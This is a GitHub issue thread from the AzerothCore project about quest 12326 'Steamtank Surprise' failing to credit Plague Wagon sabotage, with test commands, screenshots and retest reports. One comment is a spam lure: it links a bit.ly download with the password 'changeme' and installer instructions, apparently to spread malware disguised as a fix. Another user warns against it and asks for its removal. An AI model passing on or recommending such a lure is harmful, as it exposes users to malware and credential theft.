### ISSUE TITLE
[QUEST] 12326 Steamtank Surprise

### ISSUE THREAD

**Issue by manstfu** [azerothcore/azerothcore-wotlk#19758]
### Current Behaviour

![image](https://github.com/user-attachments/assets/41a834b4-7870-46ee-8fdf-a5c1ded6b64a)
Plague Wagon Sabotaged doesn't count

### Expected Blizzlike Behaviour

Count Plague Wagon Sabotaged

### Source

Quest description

### Steps to reproduce the problem

.quest add 12326
Sabotage Plague Wagon using Steam tank

### AC rev. hash/commit

rev 83f8871c31fd

### Operating system

Debian 12

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Ceikry** [comment]
Don't do that, and can someone delete this comment? @Nyeriah @Kitzunu

**Comment by mluce5** [comment]
This quest is still broken as of 10/06/2024.

**Comment by cyberpro98** [comment]
The quest is still broken 21/11/2024. Still no one fixed it

**Comment by Nyeriah** [comment]
> The quest is still broken 21/11/2024. Still no one fixed it

If an issue is open that means it has not been fixed yet.

**Comment by TheSCREWEDSoftware** [comment]
To test this
- Be an alliance char
- Be at least level 71
- `.go xyz 3850 -1380 144 571`
- `.quest add 12326`
You can't get in the steam tank.

In case it works, how to compelte

![image](https://github.com/user-attachments/assets/0c15b80d-fbf2-4c01-b393-2bdbda4176f5)

**Comment by cyberpro98** [comment]
> To test this
> 
> * Be an alliance char
> * Be at least level 71
> * `.go xyz 3850 -1380 144 571`
> * `.quest add 12326`
> * You can't get in the steam tank.
> 
> In case it works, how to compelte
> 
> ![image](https://private-user-images.githubusercontent.com/16946913/390224339-0c15b80d-fbf2-4c01-b393-2bdbda4176f5.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMwNjA3MjcsIm5iZiI6MTczMzA2MDQyNywicGF0aCI6Ii8xNjk0NjkxMy8zOTAyMjQzMzktMGMxNWI4MGQtZmJmMi00YzAxLWIzOTMtMmJkYmRhNDE3NmY1LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjAxVDEzNDAyN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTgzMjU3Yzg1MWZmNWNjMTA4MmYwMTdjMTQ0MjI1NDU1Y2ZkZjE1ZDEyYWU0NzZkOTQ3YWZiYmMwYzc5OTQ0NWMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.WzWGTllBAdqVGbSqPP_sVhhd4ZnJje-fKqvSctROTc8)

So this worked ?????? It´ll be nice if you could make a video please.

**Comment by TheSCREWEDSoftware** [comment]
This is a reference more for those that attempt or fix the issue and know how to test it

**Comment by Nyeriah** [comment]
![image](https://github.com/user-attachments/assets/12289b78-44f6-4145-ae2b-324792ac1782)

Entering the vehicle works fine for me, you can't give yourself the quest while you are already standing by the vehicle, it **might** cause issues updating the creature, although I had no issues myself

**Comment by Nyeriah** [comment]
Also got sabotage credit: 

![image](https://github.com/user-attachments/assets/4eba09e6-b01d-485f-ad27-8665f27197c3)

**Comment by TheSCREWEDSoftware** [comment]
I can re-test this when im back at the pc in a few hours, i will accept the quest at the alliance hotpost that close to the quest area (forgot the name of the keep)
